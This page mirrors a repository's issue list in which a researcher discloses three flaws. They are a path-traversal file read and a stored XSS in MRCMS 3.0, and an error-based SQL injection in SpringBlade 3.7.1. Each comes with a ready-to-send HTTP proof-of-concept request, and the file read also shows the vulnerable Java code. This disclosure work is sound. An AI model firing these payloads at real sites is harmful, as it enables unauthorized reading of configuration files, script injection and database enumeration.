Giter VIP home page Giter VIP logo

cve's People

Contributors

wy876 avatar

Stargazers

avatar avatar

Watchers

avatar avatar avatar

cve's Issues

MRCMS 3.0 Arbitrary file reading vulnerability exists /admin/file/edit.do

Build the source code locally by downloading https://gitee.com/marker/MRCMS

The vulnerability exists: http://127.0.0.1:8080/admin/index.do

Click Content Management-->File Management

Click the Edit File button 1.txt

image

Read the config.properties file in the resources directory by using ../

poc

GET /admin/file/edit.do?path=../resources/config.properties&name= HTTP/1.1
Host: 127.0.0.1:8080
Referer: http://127.0.0.1:8080/admin/index.do
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: cors
X-Requested-With: XMLHttpRequest

Read the contents of the config.properties file

image

code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java

Pass in the path and name variables in the code, obtain the file path through the File class, and finally use FileTools.getFileContet() to read the content of the obtained file.

	@RequestMapping("/edit")
	public ModelAndView edit(@RequestParam("path") String path, @RequestParam("name") String name){
		ModelAndView view = new ModelAndView(this.viewPath + "edit");
		File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
		try {
			view.addObject("data", FileTools.getFileContet(file, FileTools.FILE_CHARACTER_UTF8));
		} catch (IOException e) {
			e.printStackTrace();
		}
		view.addObject("path", encoding(path));
		view.addObject("name", encoding(name));
		return view;
	}

Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java

getFileContet method call getContent

public static final String getFileContet(File filePath,String character) throws IOException{
		return FileTools.getContent(filePath, character);
}

Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java

getContent Read file contents

	private static String getContent(File filePath, String character) throws IOException{ 
		FileInputStream __fis = new FileInputStream(filePath);//文件字节流 
		return getStreamContent(__fis, character);//返回文件内容
	}

MRCMS 3.0 There is an xss cross-site scripting vulnerability /admin/system/saveinfo.do

Build the source code locally by downloading https://gitee.com/marker/MRCMS

The vulnerability exists: http://127.0.0.1:8080/admin/index.do

image

Insert xss cross-site scripting attack code

"><img src=1 onerror=alert(/xss/)>

POC:

POST /admin/system/saveinfo.do HTTP/1.1
Host: 127.0.0.1:8080
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8080/admin/index.do
Origin: http://127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Sec-Fetch-Mode: cors
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 844

config.title=蘑菇建站系统&config.url=http://cms.yl-blog.com/&config.keywords=蘑菇建站系统&config.description=蘑菇建站系统"><img src=1 onerror=alert(/xss/)>&[email protected]&config.mobile=&config.qq=&config.copyright=版权所有©蘑菇建站系统&config.icp=蜀ICP备09035816号-2&config.defaultlang=zh-CN&config.statistics=true&config.index_page=index&config.error_page=error.html&config.themes_active=flatweb&config.themes_cache=temp/&config.dev_mode=true&config.gzip=true&config.compress=false&config.statichtml=false&config.filePath=&config.themesPath=&config.loginSafe=&config.tongjiScirpt=

image

Visit http://127.0.0.1:8080/about/us.html to trigger xss payload

image

SpringBlade 3.7.1 /api/blade-system/tenant There is an injection vulnerability in sql

Build the source code locally by downloading https://gitee.com/smallc/SpringBlade

The vulnerability exists: http://127.0.0.1/api/blade-system/tenant/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1

poc

GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Host: 127.0.0.1
Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ

Read the current database user

image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.